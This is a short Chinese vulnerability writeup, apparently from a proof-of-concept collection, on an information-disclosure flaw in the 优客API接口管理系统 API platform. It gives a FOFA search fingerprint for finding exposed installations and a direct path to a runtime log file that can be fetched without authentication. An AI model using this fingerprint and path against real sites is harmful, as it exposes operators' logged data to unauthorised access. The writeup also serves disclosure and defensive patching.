POC/wpoc/优客API接口管理系统/优客API接口管理系统存在信息泄露漏洞.md

# 优客API接口管理系统存在信息泄露漏洞

# 一、漏洞简介
优客API接口管理系统，内置30+API接口，支持服务器信息，网站ICP备案，抖音无水印，QQ在线状态QQ头像，获取历史上的今天，IP签名档，ICO站标获，随机动漫图，网站标题获取，爱站权重获取，城市天气获取，随机一言，皮皮虾无水印，每日Bing壁纸，垃圾分类，查询手机号归属地，申通快递查询等接口功能。优客API接口管理系统存在信息泄露漏洞

# 二、影响版本
+ 优客API接口管理系统

# 三、资产测绘
+ fofa

```plain
"public/static/index/css/flaghome.css"
```

+ 特征

![1731383630664-4e1345d0-9673-4677-bcc6-1ca61d9895ab.png](./img/h0O5SDzmZG9iW3Ie/1731383630664-4e1345d0-9673-4677-bcc6-1ca61d9895ab-181220.png)

# 四、漏洞复现
```plain
/runtime/log/202411/12.log
```

![1731383690530-7769f625-05cd-4ee1-9f65-7636c415cadb.png](./img/h0O5SDzmZG9iW3Ie/1731383690530-7769f625-05cd-4ee1-9f65-7636c415cadb-694826.png)



> 更新: 2024-11-27 10:00:07  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ptvdeuz7cchr75g8>